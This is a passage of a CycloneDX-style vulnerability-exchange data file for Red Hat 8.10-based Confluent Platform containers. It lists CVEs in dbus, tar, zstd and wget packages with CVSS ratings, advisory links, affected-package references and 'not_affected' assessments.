          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/dbus-daemon@1.12.8-28.el8_10?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/dbus-libs@1.12.8-28.el8_10?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/dbus-tools@1.12.8-28.el8_10?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/dbus@1.12.8-28.el8_10?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/dbus-common@1.12.8-28.el8_10?arch=noarch&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/dbus-daemon@1.12.8-28.el8_10?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/dbus-libs@1.12.8-28.el8_10?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/dbus-tools@1.12.8-28.el8_10?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/dbus@1.12.8-28.el8_10?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/dbus-common@1.12.8-28.el8_10?arch=noarch&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/dbus-daemon@1.12.8-28.el8_10?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/dbus-libs@1.12.8-28.el8_10?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/dbus-tools@1.12.8-28.el8_10?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/dbus@1.12.8-28.el8_10?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/dbus-common@1.12.8-28.el8_10?arch=noarch&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/dbus-daemon@1.12.8-28.el8_10?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/dbus-libs@1.12.8-28.el8_10?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/dbus-tools@1.12.8-28.el8_10?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/dbus@1.12.8-28.el8_10?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/dbus-common@1.12.8-28.el8_10?arch=noarch&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/dbus-daemon@1.12.8-28.el8_10?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/dbus-libs@1.12.8-28.el8_10?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/dbus-tools@1.12.8-28.el8_10?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/dbus@1.12.8-28.el8_10?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/dbus-common@1.12.8-28.el8_10?arch=noarch&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/dbus-daemon@1.12.8-28.el8_10?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/dbus-libs@1.12.8-28.el8_10?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/dbus-tools@1.12.8-28.el8_10?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/dbus@1.12.8-28.el8_10?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/dbus-common@1.12.8-28.el8_10?arch=noarch&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/dbus-daemon@1.12.8-28.el8_10?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/dbus-libs@1.12.8-28.el8_10?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/dbus-tools@1.12.8-28.el8_10?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/dbus@1.12.8-28.el8_10?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/dbus-common@1.12.8-28.el8_10?arch=noarch&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/dbus-daemon@1.12.8-28.el8_10?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/dbus-libs@1.12.8-28.el8_10?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/dbus-tools@1.12.8-28.el8_10?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/dbus@1.12.8-28.el8_10?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/dbus-common@1.12.8-28.el8_10?arch=noarch&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/dbus-daemon@1.12.8-28.el8_10?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/dbus-libs@1.12.8-28.el8_10?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/dbus-tools@1.12.8-28.el8_10?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/dbus@1.12.8-28.el8_10?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/dbus-common@1.12.8-28.el8_10?arch=noarch&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/dbus-daemon@1.12.8-28.el8_10?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/dbus-libs@1.12.8-28.el8_10?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/dbus-tools@1.12.8-28.el8_10?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/dbus@1.12.8-28.el8_10?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/dbus-common@1.12.8-28.el8_10?arch=noarch&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/dbus-daemon@1.12.8-28.el8_10?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/dbus-libs@1.12.8-28.el8_10?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/dbus-tools@1.12.8-28.el8_10?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/dbus@1.12.8-28.el8_10?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/dbus-common@1.12.8-28.el8_10?arch=noarch&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/dbus-daemon@1.12.8-28.el8_10?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/dbus-libs@1.12.8-28.el8_10?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/dbus-tools@1.12.8-28.el8_10?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/dbus@1.12.8-28.el8_10?arch=x86_64&distro=redhat-8.10&epoch=1"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "Java Runtime that executes Confluent Platform does not invoke any binaries present in the container. That assures that the vulnerable code path in the affected application is not reachable."
      }
    },
    {
      "id": "CVE-2021-20193",
      "ratings": [
        {
          "source": {
            "name": "julia"
          },
          "score": 3.3,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 4.3,
          "severity": "medium",
          "method": "CVSSv2",
          "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 3.3,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 3.3,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        401,
        125
      ],
      "description": "A flaw was found in the src/list.c of tar 1.33 and earlier. This flaw allows an attacker who can submit a crafted input file to tar to cause uncontrolled consumption of memory. The highest threat from this vulnerability is to system availability.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2021-20193"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2021-20193"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1917565"
        },
        {
          "url": "https://git.savannah.gnu.org/cgit/tar.git/commit/?id=d9d4435692150fa8ff68e1b1a473d187cc3fd777"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-20193"
        },
        {
          "url": "https://savannah.gnu.org/bugs/?59897"
        },
        {
          "url": "https://security.gentoo.org/glsa/202105-29"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-5329-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2021-20193"
        }
      ],
      "published": "2021-03-26T17:15:12+00:00",
      "updated": "2026-06-17T03:33:26+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2",
          "versions": [
            {
              "version": "2:1.30-11.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "Java Runtime that executes Confluent Platform does not invoke any binaries present in the container. That assures that the vulnerable code path in the affected application is not reachable."
      }
    },
    {
      "id": "CVE-2021-24032",
      "ratings": [
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 4.7,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 1.9,
          "severity": "info",
          "method": "CVSSv2",
          "vector": "AV:L/AC:M/Au:N/C:P/I:N/A:N"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 4.7,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.5,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        277,
        276
      ],
      "description": "Beginning in v1.4.1 and prior to v1.4.9, due to an incomplete fix for CVE-2021-24031, the Zstandard command-line utility created output files with default permissions and restricted those permissions immediately afterwards. Output files could therefore momentarily be readable or writable to unintended parties.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2021-24032"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2021-24032"
        },
        {
          "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=982519"
        },
        {
          "url": "https://github.com/advisories/GHSA-ffqj-7pgc-cmj5"
        },
        {
          "url": "https://github.com/facebook/zstd/issues/2491"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-24032"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-4760-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-5720-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2021-24032"
        },
        {
          "url": "https://www.facebook.com/security/advisories/cve-2021-24032"
        }
      ],
      "published": "2021-03-04T21:15:12+00:00",
      "updated": "2026-06-17T03:39:11+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libzstd@1.4.4-1.el8?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "1.4.4-1.el8",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/libzstd@1.4.4-1.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/libzstd@1.4.4-1.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/libzstd@1.4.4-1.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/libzstd@1.4.4-1.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/libzstd@1.4.4-1.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/libzstd@1.4.4-1.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/libzstd@1.4.4-1.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/libzstd@1.4.4-1.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/libzstd@1.4.4-1.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/libzstd@1.4.4-1.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/libzstd@1.4.4-1.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/libzstd@1.4.4-1.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/libzstd@1.4.4-1.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/libzstd@1.4.4-1.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/libzstd@1.4.4-1.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/libzstd@1.4.4-1.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/libzstd@1.4.4-1.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/libzstd@1.4.4-1.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/libzstd@1.4.4-1.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/libzstd@1.4.4-1.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/libzstd@1.4.4-1.el8?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "Java Runtime that executes Confluent Platform does not invoke any binaries present in the container. That assures that the vulnerable code path in the affected application is not reachable."
      }
    },
    {
      "id": "CVE-2021-31879",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 6.1,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 5.8,
          "severity": "medium",
          "method": "CVSSv2",
          "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:N"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 6.1,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        601
      ],
      "description": "GNU Wget through 1.21.1 does not omit the Authorization header upon a redirect to a different origin, a related issue to CVE-2018-1000007.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2021-31879"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2021-31879"
        },
        {
          "url": "https://mail.gnu.org/archive/html/bug-wget/2021-02/msg00002.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-31879"
        },
        {
          "url": "https://savannah.gnu.org/bugs/?56909"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20210618-0002/"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2021-31879"
        }
      ],
      "published": "2021-04-29T05:15:08+00:00",
      "updated": "2026-06-17T03:52:23+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "1.19.5-12.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
